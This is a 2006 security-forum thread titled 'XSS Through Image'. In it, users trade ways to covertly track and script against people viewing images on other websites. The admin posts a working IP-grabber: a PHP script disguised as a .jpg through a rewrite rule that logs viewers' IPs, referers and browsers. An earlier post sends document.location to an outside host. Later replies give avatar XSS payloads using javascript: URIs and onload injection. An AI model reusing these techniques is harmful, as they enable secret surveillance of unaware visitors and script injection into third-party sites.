Waraxe IT Security Portal
Login or Register
October 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 132
Members: 0
Total: 132
Full disclosure
SEC Consult SA-20241024-0 :: Unauthenticated Path Traversal Vulnerability in Lawo AG - vsm LTC Time Sync (vTimeSync) (CVE-2024-6049)
[RESEARCH] DTLS 'ClientHello' Race Conditions in WebRTCImplementations
Adversary3 updated with 700 malware and C2 panelvulnerabilities
SEC Consult SA-20241015-0 :: Multiple Vulnerabilities in Rittal IoT Interface & CMC III Processing Unit (CVE-2024-47943, CVE-2024-47944, CVE-2024-47945)
CVE-2024-48939: Unauthorized enabling of API in Paxton Net2software
SEC Consult SA-20241009-0 :: Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect (CVE-2024-9473)
APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS Through Image
Post new topicReply to topic View previous topic :: View next topic
XSS Through Image
PostPosted: Sun Mar 26, 2006 4:22 am Reply with quote
cdn
Beginner
Beginner
Joined: Mar 26, 2006
Posts: 2




If I hotlink an image from my website to another how can I get it to log the full url in the browser of the person viewing the image at that (or those) website(s)? Basically something that logs the url present in the browser of someone loading the image.


I guess something like this would be used for the sytax:

document.write("<img src=http://mywebsitehere/?a=" + document.location + ">");


but then what...how do i log the url from the viewer on my remote site? Is there some PHP script I can use for this purpose that would dump the url into a textfile?
View user's profile Send private message
PostPosted: Sun Mar 26, 2006 10:33 am Reply with quote
fizzi
Advanced user
Advanced user
Joined: Sep 14, 2005
Posts: 55




i would try to make a php script which logs the url the visitor came from. this php script has to be renamed to the original image file. (and your server must interpret this file as a php script) somehow you must garantee, that the original image will be loaded by the script and then send back through the script.
View user's profile Send private message
PostPosted: Sun Mar 26, 2006 5:15 pm Reply with quote
cdn
Beginner
Beginner
Joined: Mar 26, 2006
Posts: 2




Okay. what would the script be?
View user's profile Send private message
PostPosted: Sun Mar 26, 2006 6:00 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Here is one possible solution, using 'HTTP_REFERER':

1. Client-side javascript:

Code:

<script type="text/javascript">
var x=new Image();x.src="http://www.myserver.com/img/pic2871.jpg";
</script>



2. .htaccess file in "/img/" directory:

Code:

RewriteEngine on

RewriteRule ^pic([0-9]*).jpg pic321.php


3. Php logging script "pic321.php":

Code:

<?php
error_reporting(0);

//===================================================
$realpath = dirname(__FILE__);
$mainlogfile = $realpath . '/logz/log321.html';


// preparing various data

$time = date("F jS Y, h:iA");
$remote_ip = $_SERVER['REMOTE_ADDR'];
$hostname = @gethostbyaddr($remote_ip);
$referer = @htmlspecialchars($_SERVER['HTTP_REFERER']);
$browser = @htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$forwarder_ip = @htmlspecialchars(getenv('HTTP_X_FORWARDED_FOR'));
$request = @htmlspecialchars($_SERVER['REQUEST_URI']);


// appending mainlog

$mainlog = "<b>Time:</b> $time<br>";
$mainlog .= "<b>IP:</b> $remote_ip <br><b>HostName:</b> $hostname<br>";
$mainlog .= "<b>Referer:</b> $referer<br>";
$mainlog .= "<b>X Forwarder:</b> $forwarder_ip<br>";
$mainlog .= "<b>Browser:</b> $browser<br>";
$mainlog .= "<b>Request:</b> $request<br>";
$mainlog .= "--------------------------------<br>";

$fh = @fopen($mainlogfile,'ab');
@fwrite($fh,$mainlog);
@fclose($fh);

//===================================================

$buff = file_get_contents('./pic123.jpg');
header("Content-type: image/jpeg");
echo $buff;

die();
?>



Referer will work in most of the cases, but there are firewalls and other software and hardware, that can remove that piece of info. In this case
javascript "document.location" will be better choice.

Feedback is welcome Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 22, 2006 3:53 am Reply with quote
gila
Beginner
Beginner
Joined: Jul 09, 2005
Posts: 2




waraxe wrote:
Here is one possible solution, using 'HTTP_REFERER':

1. Client-side javascript:

Code:

<script type="text/javascript">
var x=new Image();x.src="http://www.myserver.com/img/pic2871.jpg";
</script>



2. .htaccess file in "/img/" directory:

Code:

RewriteEngine on

RewriteRule ^pic([0-9]*).jpg pic321.php


3. Php logging script "pic321.php":

Code:

<?php
error_reporting(0);

//===================================================
$realpath = dirname(__FILE__);
$mainlogfile = $realpath . '/logz/log321.html';


// preparing various data

$time = date("F jS Y, h:iA");
$remote_ip = $_SERVER['REMOTE_ADDR'];
$hostname = @gethostbyaddr($remote_ip);
$referer = @htmlspecialchars($_SERVER['HTTP_REFERER']);
$browser = @htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$forwarder_ip = @htmlspecialchars(getenv('HTTP_X_FORWARDED_FOR'));
$request = @htmlspecialchars($_SERVER['REQUEST_URI']);


// appending mainlog

$mainlog = "<b>Time:</b> $time<br>";
$mainlog .= "<b>IP:</b> $remote_ip <br><b>HostName:</b> $hostname<br>";
$mainlog .= "<b>Referer:</b> $referer<br>";
$mainlog .= "<b>X Forwarder:</b> $forwarder_ip<br>";
$mainlog .= "<b>Browser:</b> $browser<br>";
$mainlog .= "<b>Request:</b> $request<br>";
$mainlog .= "--------------------------------<br>";

$fh = @fopen($mainlogfile,'ab');
@fwrite($fh,$mainlog);
@fclose($fh);

//===================================================

$buff = file_get_contents('./pic123.jpg');
header("Content-type: image/jpeg");
echo $buff;

die();
?>



Referer will work in most of the cases, but there are firewalls and other software and hardware, that can remove that piece of info. In this case
javascript "document.location" will be better choice.

Feedback is welcome Wink


can you create XSS script that we can put inside the forum Avatar with
ext. file still .jpg? tq.
View user's profile Send private message
PostPosted: Wed May 24, 2006 11:06 pm Reply with quote
Tori
Regular user
Regular user
Joined: Jun 12, 2005
Posts: 6




RewriteRule is a good idea.
(You can use AddHandler to parse .gif as .php as well, another option but some free servers don't support it to prevent image hot linking.)

For forum avatars you need to find a XSS bug first. Sometimes simply javascript:("whatever") or vbscript:whatever as the forum avatar works! In IE and Mozilla Firefox <img src="javascript:('');"> is still valid syntax even though it is trapped within the quotes.

Another way is to exploit Onload="" to run javascripts.

<img name="a" src="http:/whatever.gif" width=0 height=0>
<img name="b" src="http:/whatever.gif" OnLoad=a.src=[javascript code] width=0 height=0>
View user's profile Send private message
XSS Through Image
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds